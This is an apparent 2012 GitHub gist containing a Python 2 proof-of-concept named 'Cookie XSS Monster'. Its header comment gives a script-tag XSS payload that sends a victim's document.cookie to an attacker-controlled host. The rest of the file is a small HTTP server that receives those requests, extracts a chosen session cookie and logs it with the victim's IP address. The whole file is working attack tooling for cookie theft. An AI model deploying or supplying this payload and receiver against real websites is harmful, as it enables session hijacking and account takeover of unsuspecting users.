@johnnykv
Created March 3, 2012 23:05
#Johnny Vestergaard - 2012
#jkv@unixcluster.dk
#POC: Webserver accepting cookies gathered from a website using XSS.
#requires Python 2.7
#
#Expected input is a GET request containing document.cookie, example:
# /PHPSESSID=mu7kbumqj7d4qf5ug3h7n89gs4;%20acopendivids=phpbb2,redmine;%20acgroupswithpersist=nada
#
#javascript used in the example:
#<script>javascript:img=new Image();img.src="http://10.0.0.20/"+document.cookie;</script>
import BaseHTTPServer
import argparse
# Name of the cookie that do_GET reports; empty until the -c argument is parsed.
cookieName = ''
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
    """Receiver side of the XSS-impact demonstration.

    The request path is treated as a serialised ``document.cookie`` string
    (``name=value`` pairs separated by ``;``). The pair whose name matches the
    module-level ``cookieName`` is printed together with the peer address;
    every request is answered with 404 regardless of its content.

    Session cookies flagged ``HttpOnly`` are not exposed through
    ``document.cookie`` and therefore never reach a receiver like this one.
    """

    def do_GET(self):
        """Parse the path as cookie pairs, report the watched cookie, reply 404."""
        # Drop the leading '/', split on ';' and keep only items that contain
        # '='. ``split('=')`` has no limit, so a value that itself contains '='
        # makes the two-name unpacking raise ValueError.
        # NOTE: lstrip('%20') strips any leading run of the characters '%', '2'
        # and '0' from the name, not the literal '%20' sequence; a cookie name
        # beginning with one of those characters is truncated.
        pairs = (item.split('=') for item in self.path[1:].split(';') if '=' in item)
        jar = dict((name.lstrip('%20'), value) for name, value in pairs)

        peer = self.client_address[0]
        if cookieName in jar:
            print "[%(cl)s] Cookie received: %(co)s" % {'cl': peer, 'co': jar[cookieName]}
        else:
            print "[%(cl)s] Cookie not found!" % {'cl': peer}

        # Nothing is ever served back; every request ends in a 404.
        self.send_error(404, "File not found")

    def log_message(self, format, *args):
        """Silence the per-request line BaseHTTPRequestHandler writes to stderr."""
        pass
# ASCII-art banner printed once at startup; the whitespace below is kept
# exactly as found (the layout may have been altered when the page was saved).
monster ="""
.---. .---.
: : o : me want cookie!
_..-: o : :-.._ /
.-'' ' `---' `---' " ``-.
.' " ' " . " . ' " `.
: '.---.,,.,...,.,.,.,..---. ' ;
`. " `. .' " .'
`. '`. .' ' .'
`. `-._ _.-' " .' .----.
`. " '"--...--"' . ' .' .' o `.
.'`-._' " . " _.-'`. : o :
jgs .' ```--.....--''' ' `:_ o :
.' " ' " " ; `.;";";";'
; ' " ' . ; .' ; ; ;
; ' ' ' " .' .-'
' " " ' " " _.-'
"""
# --- command-line entry point ---------------------------------------------
# Both options are mandatory; argparse exits with a usage message otherwise.
parser = argparse.ArgumentParser(description='Cookie XSS Monster.')
parser.add_argument(
    '-p',
    dest="listenPort",
    metavar="port",
    type=int,
    nargs=1,
    required=True,
    help='port to listen on',
)
parser.add_argument(
    '-c',
    dest="cookieName",
    metavar="cookie",
    type=str,
    nargs=1,
    required=True,
    help='name of cookie to drop',
)
args = parser.parse_args()

# nargs=1 yields one-element lists; unpack them into the module globals that
# Handler.do_GET reads (cookieName) and the server uses (listenPort).
(listenPort,) = args.listenPort
(cookieName,) = args.cookieName

# "" binds every local interface, so the listener is reachable from any
# network the host is attached to; a specific address narrows that exposure.
server_address = ("", listenPort)
httpd = BaseHTTPServer.HTTPServer(server_address, Handler)

print monster
print "Chewing '%(c)s' cookies on port %(p)s" % {'c' : cookieName, 'p':str(listenPort)}
httpd.serve_forever()